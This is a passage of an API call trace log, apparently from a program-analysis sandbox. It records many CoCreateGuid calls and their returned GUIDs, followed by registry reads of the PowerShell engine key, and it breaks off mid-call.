[6]=0xa9, [7]=0xea))) returned 0x0 [0249.118] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x63233788, Data2=0x9d56, Data3=0x4761, Data4=([0]=0x99, [1]=0xcd, [2]=0x1b, [3]=0x54, [4]=0xae, [5]=0xca, [6]=0x81, [7]=0x99))) returned 0x0 [0249.118] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xab960497, Data2=0xfb14, Data3=0x47f2, Data4=([0]=0xb5, [1]=0x3c, [2]=0xf6, [3]=0x7b, [4]=0x6a, [5]=0x27, [6]=0xa8, [7]=0xc9))) returned 0x0 [0249.118] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xad8c7e3b, Data2=0x74fa, Data3=0x4e6f, Data4=([0]=0x81, [1]=0x70, [2]=0xb4, [3]=0x91, [4]=0xf4, [5]=0xba, [6]=0xeb, [7]=0xcd))) returned 0x0 [0249.118] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5e33e189, Data2=0xa5a5, Data3=0x4707, Data4=([0]=0xa5, [1]=0x75, [2]=0x9, [3]=0x30, [4]=0x2d, [5]=0xe0, [6]=0xa4, [7]=0x8d))) returned 0x0 [0249.119] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdd43d537, Data2=0x5720, Data3=0x4fac, Data4=([0]=0x9d, [1]=0x79, [2]=0xb1, [3]=0x87, [4]=0xac, [5]=0x13, [6]=0x2b, [7]=0x54))) returned 0x0 [0249.119] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb0a167a4, Data2=0xf482, Data3=0x495c, Data4=([0]=0x9d, [1]=0xd2, [2]=0xca, [3]=0xb9, [4]=0x9c, [5]=0xac, [6]=0x66, [7]=0xc4))) returned 0x0 [0249.119] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xca17789d, Data2=0x189a, Data3=0x418d, Data4=([0]=0x9d, [1]=0x4f, [2]=0x52, [3]=0x83, [4]=0x9d, [5]=0xab, [6]=0xf3, [7]=0x39))) returned 0x0 [0249.119] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfb19e343, Data2=0xac10, Data3=0x499c, Data4=([0]=0xa6, [1]=0x53, [2]=0xe3, [3]=0x61, [4]=0xcf, [5]=0x19, [6]=0xf5, [7]=0x75))) returned 0x0 [0249.120] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8774fb0c, Data2=0x2e07, Data3=0x4237, Data4=([0]=0x85, [1]=0xb7, [2]=0xbb, [3]=0xdd, [4]=0x84, [5]=0x10, [6]=0x1d, [7]=0xd1))) returned 0x0 [0249.120] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb4bbdb3d, Data2=0x4595, Data3=0x4166, Data4=([0]=0xb8, [1]=0x31, [2]=0x1a, [3]=0x51, [4]=0x1f, [5]=0x2b, [6]=0x8d, [7]=0xd4))) returned 0x0 [0249.120] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc39d3eb8, Data2=0xb89f, Data3=0x4ba1, Data4=([0]=0x84, [1]=0x72, [2]=0x4, [3]=0x9b, [4]=0xb7, [5]=0x34, [6]=0xf4, [7]=0xf0))) returned 0x0 [0249.120] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3fac6830, Data2=0xc646, Data3=0x4887, Data4=([0]=0x85, [1]=0x9e, [2]=0x4f, [3]=0x3f, [4]=0x1d, [5]=0x10, [6]=0xad, [7]=0x70))) returned 0x0 [0249.121] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xef069716, Data2=0xc52a, Data3=0x413b, Data4=([0]=0x82, [1]=0xc9, [2]=0x5e, [3]=0x15, [4]=0xa3, [5]=0xb, [6]=0xb2, [7]=0x6b))) returned 0x0 [0249.121] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x230bd2f3, Data2=0x1579, Data3=0x4ad5, Data4=([0]=0xbf, [1]=0xad, [2]=0xdd, [3]=0xf4, [4]=0x47, [5]=0x89, [6]=0x3a, [7]=0x5c))) returned 0x0 [0249.121] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9f10374b, Data2=0xe2f2, Data3=0x4f11, Data4=([0]=0xa9, [1]=0x76, [2]=0xa6, [3]=0x6f, [4]=0x2d, [5]=0x9b, [6]=0x3e, [7]=0xec))) returned 0x0 [0249.121] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3943d985, Data2=0x1e08, Data3=0x4f90, Data4=([0]=0x95, [1]=0x22, [2]=0x45, [3]=0xe9, [4]=0xe7, [5]=0x7c, [6]=0x26, [7]=0xc1))) returned 0x0 [0249.122] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5462ce51, Data2=0x4abe, Data3=0x4b3e, Data4=([0]=0xa7, [1]=0x19, [2]=0x86, [3]=0x7d, [4]=0xde, [5]=0x47, [6]=0x3b, [7]=0x43))) returned 0x0 [0249.122] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3c23e1ee, Data2=0xfaa, Data3=0x4983, Data4=([0]=0x97, [1]=0xfe, [2]=0x5a, [3]=0x3e, [4]=0xe, [5]=0x60, [6]=0x95, [7]=0xd))) returned 0x0 [0249.122] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x114b3c95, Data2=0xabf3, Data3=0x442e, Data4=([0]=0x8f, [1]=0x45, [2]=0xe5, [3]=0xba, [4]=0xd2, [5]=0xcd, [6]=0x76, [7]=0x8e))) returned 0x0 [0249.123] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xebc91976, Data2=0x993f, Data3=0x418b, Data4=([0]=0x9a, [1]=0x62, [2]=0xa6, [3]=0xdf, [4]=0xce, [5]=0x3e, [6]=0xc, [7]=0x25))) returned 0x0 [0249.123] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x74be8f67, Data2=0xfc6, Data3=0x41fd, Data4=([0]=0x96, [1]=0x84, [2]=0x2e, [3]=0xcc, [4]=0x70, [5]=0x76, [6]=0x34, [7]=0xee))) returned 0x0 [0249.124] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9ffeba, Data2=0xa334, Data3=0x4dd6, Data4=([0]=0xb5, [1]=0xfe, [2]=0x2c, [3]=0x1b, [4]=0xd8, [5]=0xec, [6]=0xc1, [7]=0xe6))) returned 0x0 [0249.124] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa99d6b81, Data2=0xa030, Data3=0x4847, Data4=([0]=0x8b, [1]=0x7, [2]=0xc2, [3]=0xe2, [4]=0xf0, [5]=0xa5, [6]=0xe, [7]=0x8a))) returned 0x0 [0249.124] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfdded937, Data2=0x65a1, Data3=0x458a, Data4=([0]=0xbb, [1]=0x8b, [2]=0x6f, [3]=0xc8, [4]=0x9c, [5]=0x6d, [6]=0x4, [7]=0x56))) returned 0x0 [0249.124] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xac533b4c, Data2=0x9469, Data3=0x4732, Data4=([0]=0x9c, [1]=0x76, [2]=0x2d, [3]=0x28, [4]=0xc0, [5]=0xf8, [6]=0x42, [7]=0xf0))) returned 0x0 [0249.125] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4f1fc69f, Data2=0xef21, Data3=0x4b96, Data4=([0]=0x9d, [1]=0x75, [2]=0x24, [3]=0x38, [4]=0x69, [5]=0x14, [6]=0xc9, [7]=0x3a))) returned 0x0 [0249.125] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5baf11f0, Data2=0xb44d, Data3=0x44e5, Data4=([0]=0xb4, [1]=0x42, [2]=0x2c, [3]=0x88, [4]=0x33, [5]=0x5f, [6]=0xde, [7]=0xff))) returned 0x0 [0249.125] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5ba44bc8, Data2=0x6318, Data3=0x4b39, Data4=([0]=0x9b, [1]=0xa7, [2]=0x34, [3]=0x4b, [4]=0xca, [5]=0x3d, [6]=0x31, [7]=0xa7))) returned 0x0 [0249.126] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6787476d, Data2=0x14b0, Data3=0x451d, Data4=([0]=0x9e, [1]=0x81, [2]=0xb4, [3]=0x29, [4]=0xfd, [5]=0xa, [6]=0xa7, [7]=0x92))) returned 0x0 [0249.126] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6fcf2be0, Data2=0x494e, Data3=0x4635, Data4=([0]=0x8c, [1]=0x2c, [2]=0x4e, [3]=0xe4, [4]=0xcc, [5]=0xb6, [6]=0xe, [7]=0x5a))) returned 0x0 [0249.126] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf9063e6e, Data2=0x2464, Data3=0x4391, Data4=([0]=0xb7, [1]=0x76, [2]=0xcf, [3]=0xa8, [4]=0xbc, [5]=0x73, [6]=0x6a, [7]=0xfc))) returned 0x0 [0249.127] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc11b58bb, Data2=0x17ab, Data3=0x4bad, Data4=([0]=0xb1, [1]=0xa2, [2]=0x1, [3]=0x56, [4]=0xfb, [5]=0x39, [6]=0x97, [7]=0x12))) returned 0x0 [0249.127] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x57b0d21c, Data2=0x9d86, Data3=0x49c3, Data4=([0]=0x8f, [1]=0x6b, [2]=0x4d, [3]=0x3b, [4]=0x93, [5]=0x63, [6]=0xe0, [7]=0x2e))) returned 0x0 [0249.127] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc6f565ec, Data2=0xc578, Data3=0x4b20, Data4=([0]=0x97, [1]=0x2c, [2]=0x38, [3]=0x74, [4]=0x49, [5]=0x7, [6]=0x52, [7]=0x71))) returned 0x0 [0249.128] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x154c0654, Data2=0x1605, Data3=0x4f45, Data4=([0]=0x82, [1]=0xaa, [2]=0x83, [3]=0x9a, [4]=0x23, [5]=0xbd, [6]=0x76, [7]=0xa8))) returned 0x0 [0249.128] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe6ea5e45, Data2=0x152d, Data3=0x489d, Data4=([0]=0xb5, [1]=0xc6, [2]=0xdc, [3]=0xf, [4]=0x25, [5]=0xf6, [6]=0x10, [7]=0xc7))) returned 0x0 [0249.128] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb04388b9, Data2=0x1ab1, Data3=0x4f17, Data4=([0]=0xba, [1]=0x99, [2]=0x5a, [3]=0x3e, [4]=0xba, [5]=0x56, [6]=0xb3, [7]=0xcd))) returned 0x0 [0249.129] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbc4ac8f1, Data2=0xb7e2, Data3=0x41e8, Data4=([0]=0xb3, [1]=0xa5, [2]=0x26, [3]=0xe7, [4]=0x8d, [5]=0x19, [6]=0xc2, [7]=0xe9))) returned 0x0 [0249.129] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x15c668ac, Data2=0x8560, Data3=0x4681, Data4=([0]=0xad, [1]=0x31, [2]=0x7a, [3]=0x91, [4]=0xe7, [5]=0xa0, [6]=0x43, [7]=0x57))) returned 0x0 [0249.129] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9cb0df7d, Data2=0xb21, Data3=0x49c5, Data4=([0]=0x94, [1]=0x72, [2]=0xac, [3]=0xfe, [4]=0xca, [5]=0x30, [6]=0x9d, [7]=0x90))) returned 0x0 [0249.130] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd9e0c364, Data2=0x8221, Data3=0x4a56, Data4=([0]=0x91, [1]=0xce, [2]=0x63, [3]=0x14, [4]=0x2f, [5]=0x8e, [6]=0x1f, [7]=0x58))) returned 0x0 [0249.130] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x988b8aa5, Data2=0xeb30, Data3=0x42a1, Data4=([0]=0x9f, [1]=0x20, [2]=0x95, [3]=0x9, [4]=0xa5, [5]=0x1a, [6]=0x2c, [7]=0x26))) returned 0x0 [0249.130] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xada316f1, Data2=0xd46b, Data3=0x4110, Data4=([0]=0xb8, [1]=0xc2, [2]=0xf8, [3]=0x99, [4]=0x62, [5]=0x63, [6]=0x94, [7]=0x6f))) returned 0x0 [0249.130] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbee45a14, Data2=0xeb95, Data3=0x48e5, Data4=([0]=0x97, [1]=0x89, [2]=0xb0, [3]=0x60, [4]=0x49, [5]=0xf2, [6]=0x5e, [7]=0xde))) returned 0x0 [0249.131] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xba89df57, Data2=0xbd70, Data3=0x43fb, Data4=([0]=0x97, [1]=0xd0, [2]=0x5f, [3]=0x52, [4]=0xaf, [5]=0xa, [6]=0x8d, [7]=0x60))) returned 0x0 [0249.131] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1e9a1bc4, Data2=0x767f, Data3=0x4f58, Data4=([0]=0xac, [1]=0x61, [2]=0xa7, [3]=0x15, [4]=0xdb, [5]=0xb5, [6]=0x9e, [7]=0x96))) returned 0x0 [0249.131] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4c25dc77, Data2=0x38a3, Data3=0x4ee9, Data4=([0]=0x9d, [1]=0x7d, [2]=0x28, [3]=0x5d, [4]=0x59, [5]=0x99, [6]=0x4c, [7]=0x83))) returned 0x0 [0249.131] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3f3719f, Data2=0x9c40, Data3=0x43cf, Data4=([0]=0xbb, [1]=0x51, [2]=0x25, [3]=0xce, [4]=0x76, [5]=0x67, [6]=0xef, [7]=0x95))) returned 0x0 [0249.132] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3df74a47, Data2=0xd9d6, Data3=0x4359, Data4=([0]=0xa1, [1]=0xf3, [2]=0xb5, [3]=0x9d, [4]=0x5a, [5]=0x5e, [6]=0xe0, [7]=0x11))) returned 0x0 [0249.132] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb9001832, Data2=0x25dc, Data3=0x4abc, Data4=([0]=0x86, [1]=0xc6, [2]=0xd9, [3]=0x16, [4]=0xf9, [5]=0x5a, [6]=0xac, [7]=0xec))) returned 0x0 [0249.132] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd9375402, Data2=0xe80c, Data3=0x4868, Data4=([0]=0x8f, [1]=0xa0, [2]=0xba, [3]=0xc5, [4]=0x5d, [5]=0x34, [6]=0xa, [7]=0xe6))) returned 0x0 [0249.132] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x453493f8, Data2=0x56b0, Data3=0x4d8d, Data4=([0]=0x90, [1]=0x2c, [2]=0x5c, [3]=0x8e, [4]=0x27, [5]=0x5b, [6]=0x77, [7]=0xf8))) returned 0x0 [0249.133] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3f059e9d, Data2=0xa744, Data3=0x4ff2, Data4=([0]=0xbb, [1]=0x17, [2]=0x93, [3]=0x4c, [4]=0x27, [5]=0x50, [6]=0x9c, [7]=0x76))) returned 0x0 [0249.133] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3e9ff38, Data2=0xa140, Data3=0x47f3, Data4=([0]=0xb1, [1]=0x73, [2]=0x7e, [3]=0x99, [4]=0x49, [5]=0xb0, [6]=0x9d, [7]=0xfa))) returned 0x0 [0249.133] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb906c803, Data2=0x7e1d, Data3=0x4e1a, Data4=([0]=0x89, [1]=0x19, [2]=0xb7, [3]=0x24, [4]=0xba, [5]=0x8c, [6]=0x8d, [7]=0x1d))) returned 0x0 [0249.133] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdabf3632, Data2=0x4f71, Data3=0x4afa, Data4=([0]=0x97, [1]=0x34, [2]=0xb6, [3]=0x6a, [4]=0xca, [5]=0xdc, [6]=0x65, [7]=0x47))) returned 0x0 [0249.134] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4626f329, Data2=0xd67b, Data3=0x44c2, Data4=([0]=0x9f, [1]=0xca, [2]=0x5c, [3]=0x41, [4]=0xa8, [5]=0xdc, [6]=0x53, [7]=0x30))) returned 0x0 [0249.134] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1506e4b8, Data2=0x5b53, Data3=0x4333, Data4=([0]=0x80, [1]=0x39, [2]=0x2e, [3]=0xcf, [4]=0x6f, [5]=0x24, [6]=0xe9, [7]=0xbb))) returned 0x0 [0249.134] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf9164cbd, Data2=0x84fd, Data3=0x4dc8, Data4=([0]=0x87, [1]=0x54, [2]=0x6e, [3]=0xfc, [4]=0x61, [5]=0x2f, [6]=0x2e, [7]=0x68))) returned 0x0 [0249.135] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf9343698, Data2=0xe289, Data3=0x4da0, Data4=([0]=0x9f, [1]=0x33, [2]=0xa1, [3]=0x1f, [4]=0xfd, [5]=0x37, [6]=0x8b, [7]=0x90))) returned 0x0 [0249.135] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xcb3c2319, Data2=0x811d, Data3=0x41b1, Data4=([0]=0xab, [1]=0x82, [2]=0xe1, [3]=0x29, [4]=0x90, [5]=0xb, [6]=0x42, [7]=0xbf))) returned 0x0 [0249.135] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x425469b8, Data2=0x5eb1, Data3=0x4cf0, Data4=([0]=0xad, [1]=0xc9, [2]=0x9b, [3]=0xc, [4]=0xc4, [5]=0x5c, [6]=0xfb, [7]=0x7d))) returned 0x0 [0249.135] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc867b9c4, Data2=0x67b5, Data3=0x426e, Data4=([0]=0xb9, [1]=0xa0, [2]=0x57, [3]=0x6f, [4]=0x8f, [5]=0xac, [6]=0x5a, [7]=0x1d))) returned 0x0 [0249.135] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x100a5ff, Data2=0xcd07, Data3=0x44b9, Data4=([0]=0xb5, [1]=0xc9, [2]=0xa3, [3]=0x46, [4]=0xc7, [5]=0x65, [6]=0x14, [7]=0xaa))) returned 0x0 [0249.136] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6e76d762, Data2=0x80da, Data3=0x4a0d, Data4=([0]=0xa2, [1]=0xce, [2]=0x83, [3]=0x56, [4]=0x7e, [5]=0xb1, [6]=0x52, [7]=0xa0))) returned 0x0 [0249.136] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa0f3dd0d, Data2=0xcc98, Data3=0x43fb, Data4=([0]=0x81, [1]=0xa0, [2]=0x83, [3]=0x67, [4]=0xab, [5]=0x29, [6]=0x3e, [7]=0x11))) returned 0x0 [0249.136] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc0dbbf00, Data2=0xa308, Data3=0x4a65, Data4=([0]=0xb1, [1]=0xdf, [2]=0xc0, [3]=0xf8, [4]=0x14, [5]=0x78, [6]=0x13, [7]=0x52))) returned 0x0 [0249.136] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfe11691a, Data2=0xf434, Data3=0x47bf, Data4=([0]=0x85, [1]=0x92, [2]=0xf, [3]=0xb3, [4]=0x3e, [5]=0x3e, [6]=0xe1, [7]=0xb8))) returned 0x0 [0249.136] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2a2487ba, Data2=0xd036, Data3=0x45b1, Data4=([0]=0x8a, [1]=0x1b, [2]=0x16, [3]=0x24, [4]=0x94, [5]=0x93, [6]=0xd3, [7]=0x1))) returned 0x0 [0249.137] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc7170c52, Data2=0x4f96, Data3=0x47ef, Data4=([0]=0x8d, [1]=0xec, [2]=0x45, [3]=0xbb, [4]=0xf0, [5]=0xe, [6]=0xdb, [7]=0x7d))) returned 0x0 [0249.137] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2aca500a, Data2=0x9f1d, Data3=0x4ad4, Data4=([0]=0xb6, [1]=0x7b, [2]=0xfe, [3]=0x58, [4]=0x5, [5]=0x1e, [6]=0x8d, [7]=0xee))) returned 0x0 [0249.137] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x955fc358, Data2=0x6177, Data3=0x4566, Data4=([0]=0xb0, [1]=0x66, [2]=0xd0, [3]=0x9, [4]=0xde, [5]=0x60, [6]=0x31, [7]=0xfb))) returned 0x0 [0249.137] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x173bed6d, Data2=0x2ebd, Data3=0x4e17, Data4=([0]=0xaf, [1]=0x81, [2]=0x3a, [3]=0x36, [4]=0x1f, [5]=0xd8, [6]=0x17, [7]=0x5b))) returned 0x0 [0249.137] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6a498881, Data2=0x89c7, Data3=0x46f0, Data4=([0]=0x83, [1]=0xfc, [2]=0xaa, [3]=0xfa, [4]=0x4f, [5]=0xfa, [6]=0xb6, [7]=0x24))) returned 0x0 [0249.138] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf9aed664, Data2=0xdba0, Data3=0x4687, Data4=([0]=0x83, [1]=0xfe, [2]=0x6a, [3]=0x43, [4]=0x63, [5]=0x71, [6]=0x32, [7]=0x47))) returned 0x0 [0249.138] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x395de6b, Data2=0x1340, Data3=0x4eb0, Data4=([0]=0x9d, [1]=0x9b, [2]=0xb9, [3]=0xcf, [4]=0xbd, [5]=0xe0, [6]=0xb2, [7]=0x22))) returned 0x0 [0249.138] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc327443e, Data2=0xbbf4, Data3=0x4c73, Data4=([0]=0xbc, [1]=0x63, [2]=0x5f, [3]=0x69, [4]=0xb6, [5]=0xf7, [6]=0x45, [7]=0xcd))) returned 0x0 [0249.138] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4941c20, Data2=0x2f25, Data3=0x4208, Data4=([0]=0xb1, [1]=0x1b, [2]=0x8e, [3]=0x8, [4]=0xa1, [5]=0x67, [6]=0x23, [7]=0x49))) returned 0x0 [0249.138] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6f8f0f8f, Data2=0xf765, Data3=0x4f18, Data4=([0]=0xae, [1]=0x52, [2]=0x57, [3]=0xae, [4]=0xd1, [5]=0xc9, [6]=0xdd, [7]=0x49))) returned 0x0 [0249.139] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5ec63e64, Data2=0xa6b, Data3=0x4110, Data4=([0]=0x9a, [1]=0xe9, [2]=0x5, [3]=0x7, [4]=0x67, [5]=0xcf, [6]=0x10, [7]=0x32))) returned 0x0 [0249.139] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8a80c0bc, Data2=0xe28f, Data3=0x47af, Data4=([0]=0xbe, [1]=0x3, [2]=0x98, [3]=0x19, [4]=0x4b, [5]=0x0, [6]=0x6e, [7]=0x88))) returned 0x0 [0249.139] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7b85257b, Data2=0xa9f, Data3=0x4541, Data4=([0]=0x8a, [1]=0x2e, [2]=0x98, [3]=0x1f, [4]=0x1a, [5]=0x19, [6]=0x1, [7]=0x82))) returned 0x0 [0249.140] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfad84e37, Data2=0xfb3e, Data3=0x4551, Data4=([0]=0x98, [1]=0x27, [2]=0xc7, [3]=0x35, [4]=0xb2, [5]=0x60, [6]=0x0, [7]=0x3b))) returned 0x0 [0249.140] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x37715845, Data2=0x5863, Data3=0x432c, Data4=([0]=0xb8, [1]=0x86, [2]=0x94, [3]=0x38, [4]=0xc4, [5]=0xae, [6]=0x3d, [7]=0xbf))) returned 0x0 [0249.140] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc2d04f55, Data2=0x6bec, Data3=0x4fb7, Data4=([0]=0xa4, [1]=0x31, [2]=0x5b, [3]=0x21, [4]=0xed, [5]=0x8d, [6]=0x40, [7]=0x26))) returned 0x0 [0249.140] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2efa84d2, Data2=0xafa9, Data3=0x4f03, Data4=([0]=0xaa, [1]=0x5a, [2]=0x67, [3]=0x11, [4]=0x47, [5]=0x19, [6]=0x74, [7]=0xc5))) returned 0x0 [0249.141] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1e37a6e6, Data2=0xcb7d, Data3=0x4b45, Data4=([0]=0x9e, [1]=0x1d, [2]=0xad, [3]=0x5a, [4]=0xe5, [5]=0x77, [6]=0x3, [7]=0x65))) returned 0x0 [0249.141] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7e4e3b6d, Data2=0x364e, Data3=0x4429, Data4=([0]=0xad, [1]=0x54, [2]=0x18, [3]=0x7a, [4]=0xda, [5]=0x26, [6]=0xe5, [7]=0xa0))) returned 0x0 [0249.141] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x937d800d, Data2=0x1f35, Data3=0x4078, Data4=([0]=0x9f, [1]=0xd, [2]=0x1b, [3]=0x11, [4]=0x64, [5]=0xa2, [6]=0x95, [7]=0x6))) returned 0x0 [0249.141] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbf81551c, Data2=0x9b9f, Data3=0x41eb, Data4=([0]=0x94, [1]=0x7c, [2]=0xb, [3]=0xb6, [4]=0xc7, [5]=0xfa, [6]=0xb1, [7]=0x3))) returned 0x0 [0249.141] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb2cb42df, Data2=0x3c47, Data3=0x4d94, Data4=([0]=0x88, [1]=0x33, [2]=0xe9, [3]=0xfc, [4]=0x8d, [5]=0x17, [6]=0xb8, [7]=0x87))) returned 0x0 [0249.142] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf4a61db7, Data2=0x9570, Data3=0x4de9, Data4=([0]=0x99, [1]=0x51, [2]=0xa2, [3]=0x60, [4]=0xd9, [5]=0x8f, [6]=0x43, [7]=0x4))) returned 0x0 [0249.142] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7f57a258, Data2=0x2f4, Data3=0x4646, Data4=([0]=0x9b, [1]=0x28, [2]=0x40, [3]=0x6d, [4]=0xfd, [5]=0x2e, [6]=0x51, [7]=0x3c))) returned 0x0 [0249.142] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x393e8e3a, Data2=0x6913, Data3=0x4a9e, Data4=([0]=0xb0, [1]=0x50, [2]=0x56, [3]=0x80, [4]=0x75, [5]=0x68, [6]=0x79, [7]=0x8b))) returned 0x0 [0249.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fbf418 | out: phkResult=0x6fbf418*=0x758) returned 0x0 [0249.217] RegQueryValueExW (in: hKey=0x758, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6fbf438, lpData=0x0, 